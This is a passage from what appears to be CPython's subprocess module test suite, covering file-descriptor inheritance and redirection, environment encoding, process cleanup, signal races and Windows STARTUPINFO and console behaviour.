# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def _check_swap_std_fds_with_one_closed(self, from_fds, to_fds):
saved_fds = self._save_fds(range(3))
try:
for from_fd in from_fds:
with tempfile.TemporaryFile() as f:
os.dup2(f.fileno(), from_fd)
fd_to_close = (set(range(3)) - set(from_fds)).pop()
os.close(fd_to_close)
arg_names = ['stdin', 'stdout', 'stderr']
kwargs = {}
for from_fd, to_fd in zip(from_fds, to_fds):
kwargs[arg_names[to_fd]] = from_fd
code = textwrap.dedent(r'''
import os, sys
skipped_fd = int(sys.argv[1])
for fd in range(3):
if fd != skipped_fd:
os.write(fd, str(fd).encode('ascii'))
''')
skipped_fd = (set(range(3)) - set(to_fds)).pop()
rc = subprocess.call([sys.executable, '-c', code, str(skipped_fd)],
**kwargs)
self.assertEqual(rc, 0)
for from_fd, to_fd in zip(from_fds, to_fds):
os.lseek(from_fd, 0, os.SEEK_SET)
read_bytes = os.read(from_fd, 1024)
read_fds = list(map(int, read_bytes.decode('ascii')))
msg = textwrap.dedent(f"""
When testing {from_fds} to {to_fds} redirection,
parent descriptor {from_fd} got redirected
to descriptor(s) {read_fds} instead of descriptor {to_fd}.
""")
self.assertEqual([to_fd], read_fds, msg)
finally:
self._restore_fds(saved_fds)
# Check that subprocess can remap std fds correctly even
# if one of them is closed (#32844).
def test_swap_std_fds_with_one_closed(self):
for from_fds in itertools.combinations(range(3), 2):
for to_fds in itertools.permutations(range(3), 2):
self._check_swap_std_fds_with_one_closed(from_fds, to_fds)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
ZERO_RETURN_CMD,
preexec_fn=prepare)
except ValueError as err:
# Pure Python implementations keeps the message
self.assertIsNone(subprocess._fork_exec)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._fork_exec)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process
env['LC_ALL'] = 'C'
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(ZERO_RETURN_CMD[0])
args = list(ZERO_RETURN_CMD[1:])
path, program = os.path.split(ZERO_RETURN_CMD[0])
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program]+args)
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'%s' %s" % (abs_program, " ".join(args).encode("utf-8"))
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program]+args, env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program]+args, env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=fds_to_keep)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest processes maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE aftr setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave a two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
ZERO_RETURN_CMD,
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
# bpo-32270: Ensure that descriptors specified in pass_fds
# are inherited even if they are used in redirections.
# Contributed by @izbyshev.
def test_pass_fds_redirected(self):
"""Regression test for https://bugs.python.org/issue32270."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
pass_fds = []
for _ in range(2):
fd = os.open(os.devnull, os.O_RDWR)
self.addCleanup(os.close, fd)
pass_fds.append(fd)
stdout_r, stdout_w = os.pipe()
self.addCleanup(os.close, stdout_r)
self.addCleanup(os.close, stdout_w)
pass_fds.insert(1, stdout_w)
with subprocess.Popen([sys.executable, fd_status],
stdin=pass_fds[0],
stdout=pass_fds[1],
stderr=pass_fds[2],
close_fds=True,
pass_fds=pass_fds):
output = os.read(stdout_r, 1024)
fds = {int(num) for num in output.split(b',')}
self.assertEqual(fds, {0, 1, 2} | frozenset(pass_fds), f"output={output!a}")
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = import_helper.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with warnings_helper.check_warnings(('', ResourceWarning)):
p = None
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with warnings_helper.check_warnings(('', ResourceWarning)):
p = None
support.gc_collect() # For PyPy or other GCs.
os.kill(pid, signal.SIGKILL)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError) as err:
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, 0,
False, [], 0, -1,
func, False)
# Attempt to prevent
# "TypeError: fork_exec() takes exactly N arguments (M given)"
# from passing the test. More refactoring to have us start
# with a valid *args list, confirm a good call with that works
# before mutating it in various ways to ensure that bad calls
# with individual arg type errors raise a typeerror would be
# ideal. Saving that for a future PR...
self.assertNotIn('takes exactly', str(err.exception))
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
class BadInt:
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, 0,
None, None, None, -1,
None, "no vfork")
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(_testcapi is not None
and hasattr(_testcapi, 'W_STOPCODE'),
'need _testcapi.W_STOPCODE')
def test_stopped(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
args = ZERO_RETURN_CMD
proc = subprocess.Popen(args)
# Wait until the real process completes to avoid zombie process
support.wait_process(proc.pid, exitcode=0)
status = _testcapi.W_STOPCODE(3)
with mock.patch('subprocess.os.waitpid', return_value=(proc.pid, status)):
returncode = proc.wait()
self.assertEqual(returncode, -3)
def test_send_signal_race(self):
# bpo-38630: send_signal() must poll the process exit status to reduce
# the risk of sending the signal to the wrong process.
proc = subprocess.Popen(ZERO_RETURN_CMD)
# wait until the process completes without using the Popen APIs.
support.wait_process(proc.pid, exitcode=0)
# returncode is still None but the process completed.
self.assertIsNone(proc.returncode)
with mock.patch("os.kill") as mock_kill:
proc.send_signal(signal.SIGTERM)
# send_signal() didn't call os.kill() since the process already
# completed.
mock_kill.assert_not_called()
# Don't check the returncode value: the test reads the exit status,
# so Popen failed to read it and uses a default returncode instead.
self.assertIsNotNone(proc.returncode)
def test_send_signal_race2(self):
# bpo-40550: the process might exist between the returncode check and
# the kill operation
p = subprocess.Popen([sys.executable, '-c', 'exit(1)'])
# wait for process to exit
while not p.returncode:
p.poll()
with mock.patch.object(p, 'poll', new=lambda: None):
p.returncode = None
p.send_signal(signal.SIGTERM)
p.kill()
def test_communicate_repeated_call_after_stdout_close(self):
proc = subprocess.Popen([sys.executable, '-c',
'import os, time; os.close(1), time.sleep(2)'],
stdout=subprocess.PIPE)
while True:
try:
proc.communicate(timeout=0.1)
return
except subprocess.TimeoutExpired:
pass
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USERSHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
dwFlags=STARTF_USERSHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_copy(self):
# bpo-34044: Popen must not modify input STARTUPINFO structure
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
# Call Popen() twice with the same startupinfo object to make sure
# that it's not modified
for _ in range(2):
cmd = ZERO_RETURN_CMD
with open(os.devnull, 'w') as null:
proc = subprocess.Popen(cmd,
stdout=null,
stderr=subprocess.STDOUT,
startupinfo=startupinfo)
with proc:
proc.communicate()
self.assertEqual(proc.returncode, 0)
self.assertEqual(startupinfo.dwFlags,
subprocess.STARTF_USESHOWWINDOW)
self.assertIsNone(startupinfo.hStdInput)
self.assertIsNone(startupinfo.hStdOutput)
self.assertIsNone(startupinfo.hStdError)
self.assertEqual(startupinfo.wShowWindow, subprocess.SW_HIDE)
self.assertEqual(startupinfo.lpAttributeList, {"handle_list": []})
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
@support.cpython_only
def test_issue31471(self):
# There shouldn't be an assertion failure in Popen() in case the env
# argument has a bad keys() method.
class BadEnv(dict):
keys = None
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, env=BadEnv())
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_close_fds_with_stdio(self):
import msvcrt
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
handles = []
for fd in fds:
os.set_inheritable(fd, True)
handles.append(msvcrt.get_osfhandle(fd))
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
int(stdout.strip()) # Check that stdout is an integer
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# The same as the previous call, but with an empty handle_list
handle_list = []
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handle_list}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# Check for a warning due to using handle_list and close_fds=False
with warnings_helper.check_warnings((".*overriding close_fds",
RuntimeWarning)):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handles[:]}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
def test_empty_attribute_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_empty_handle_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": []}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
class RecordingPopen(subprocess.Popen):
"""A Popen that saves a reference to each instance for testing."""
instances_created = []
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.instances_created.append(self)
@mock.patch.object(subprocess.Popen, "_communicate")
def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
**kwargs):
"""Fake a SIGINT happening during Popen._communicate() and ._wait().
This avoids the need to actually try and get test environments to send
and receive signals reliably across platforms. The net effect of a ^C
happening during a blocking subprocess execution which we want to clean
up from is a KeyboardInterrupt coming out of communicate() or wait().
"""
mock__communicate.side_effect = KeyboardInterrupt
try:
with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
# We patch out _wait() as no signal was involved so the
# child process isn't actually going to exit rapidly.
